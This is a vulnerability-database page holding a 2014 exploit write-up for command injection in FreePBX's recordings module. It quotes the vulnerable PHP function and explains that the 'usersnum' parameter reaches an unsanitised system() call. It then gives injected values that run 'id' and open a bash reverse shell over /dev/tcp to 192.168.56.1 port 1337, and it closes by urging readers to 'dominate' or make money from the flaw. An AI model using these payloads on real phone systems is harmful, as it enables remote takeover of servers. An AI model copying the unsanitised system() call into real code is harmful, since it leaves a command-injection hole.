Vulners
Lucene search
FreePBX 'usersnum'参数远程命令执行漏洞
Vulnerable function "recording_addpage" @
admin/modules/recordings/page.recordings.php
function recording_addpage($usersnum) {
global $fc_save;
global $fc_check;
global $recordings_save_path;
?>
<div class="content">
<h2><?php echo _("System Recordings")?></h2>
<h3><?php echo _("Add Recording") ?></h3>
<h5><?php echo _("Step 1: Record or upload")?></h5>
<?php if (!empty($usersnum)) {
echo '<p>';
echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
dial")."&nbsp;".$fc_save." <span>";
echo _("Start speaking at the tone. Press # when
finished.")."</span></a>";
echo _("and speak the message you wish to record. Press # when
finished.")."\n";
echo '</p>';
} else { ?>
<form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post">
<input type="hidden" name="display" value="recordings">
<?php
echo _("If you wish to make and verify recordings from your phone,
please enter your extension number here:"); ?>
<input type="text" size="6" name="usersnum" tabindex="<?php echo
++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
_("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
</form>
<?php } ?>
<p></p>
<form enctype="multipart/form-data" name="upload" action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="POST">
<?php echo _("Alternatively, upload a recording in any supported
asterisk format. Note that if you're using .wav, (eg, recorded with
Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
8000Hz")?>:<br>
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="action" value="recordings_start">
<input type="hidden" name="usersnum" value="<?php echo
$usersnum ?>">
<input type="file" name="ivrfile" tabindex="<?php echo
++$tabindex;?>"/>
<input type="button" value="<?php echo _("Upload")?>"
onclick="document.upload.submit(upload);alert('<?php echo
addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
echo ++$tabindex;?>"/>
</form>
<?php
if (isset($_FILES['ivrfile']['tmp_name']) &&
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
if (empty($usersnum) || !ctype_digit($usersnum)) {
$dest = "unnumbered-";
} else {
$dest = "{$usersnum}-";
}
$suffix =
preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
"."), 1));
$destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
$destfilename);
system("chmod g+rw ".$destfilename);
echo "<h6>"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."</h6>";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>
<form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post" onsubmit="return rec_onsubmit();">
<input type="hidden" name="action" value="recorded">
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
<?php
if (!empty($usersnum)) { ?>
<h5><?php echo _("Step 2: Verify")?></h5>
<p> <?php echo _("After recording or
uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to
listen to your recording.")?> </p>
<p> <?php echo _("If you wish to re-record your message,
dial")."&nbsp;".$fc_save; ?></p>
<h5><?php echo _("Step 3: Name")?> </h5> <?php
} else {
echo "<h5>"._("Step 2: Name")."</h5>";
} ?>
<table style="text-align:right;">
<tr valign="top">
<td valign="top"><?php echo _("Name this Recording")?>: </td>
<td style="text-align:left"><input type="text" name="rname"
value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
</tr>
</table>
<h6><?php
echo _("Click \"SAVE\" when you are satisfied with your recording");
echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
<input name="Submit" type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
<?php recordings_form_jscript(); ?>
</form>
</div>
<?php
}
Actually as you can see there are many exploitable lines there , but here
am interested about this line
system("chmod g+rw ".$destfilename);
if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Target/admin/config.php?type=setup&display=recordings
before uploading open firebug
search for usersnum
edit value to
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate , or even make some $$ if you r interested ;)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2014 00:00Current
6.9Medium risk
Vulners AI Score6.9